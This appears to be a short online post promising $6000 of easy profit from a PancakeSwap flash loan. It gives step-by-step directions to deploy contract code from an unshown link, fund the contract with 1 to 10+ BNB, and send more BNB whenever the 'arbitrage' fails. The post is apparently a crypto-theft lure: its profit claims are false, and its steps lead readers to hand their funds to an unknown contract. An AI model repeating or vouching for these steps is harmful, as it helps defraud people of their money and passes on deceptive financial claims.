Here’s How You can make $6000 easy using Pancakeswap

4 months ago

Read all steps carefully:

• Install Metamask Extension on your browser

• Open from within your browser.

• Open the “contracts” folder and create a new file.

• Name the file flashloans.sol and paste the contract code link below. ►

• Click on Solidity Compiler. Set compiler version to top of the code “0.6.6+commit.6c089d02” and Click “Compile flashloan.sol”

• Click on Deploy & Run transactions and set “ENVIRONMENT” to Injected Web3 to connect your MetaMask wallet.

• Click on the down arrow right from the “Deploy” button

• On “_TOKENNAME” Funny


• On “_LOANAMOUNT” 1000

Click Transact and confirm the transaction in MetaMask.

NOTE: In the case of any transaction fail, it is usually as a result of traffic congestion.

Place all transaction mode on “aggressive” and the transaction will go through

• Wait for the transaction to confirm.

• Copy the address of the newly deployed contract.

• Send BNB to the deployed contract to initiate the swap 1BNB+ (1–10BNB+ is better as it will provide enough leverage to borrow more for each swap)

• Wait for the transaction to confirm.

• Click “action” (red box) to execute the Flash Loan.

• Confirm the transaction in MetaMask and wait for the confirmation.

You can now check your wallet

Note: If it doesn’t work with 1.0 BNB try to send another 2.0 BNB to your contract address and click on the action button again (1.0+ is better), because fees may be different from day to day. (3.0+ BNB for each 1000 BNB you are borrowing).

Avoid using very small amounts, as the contract may fail if the amount is less than 0.5 BNB. Because the price of gas fluctuates from time to time, the arbitrage may fail in some very rare circumstances owing to depletion of BNB in your smart contract.

Don’t panic! All you have to do now is wait a few minutes (5–10 minutes) and repeat the process, preferably with a loan amount of 825 and a gas limit of 31,560 and it should work perfectly, albeit with a lesser profit.

When you’re finished, make sure to move your BNB to another wallet.

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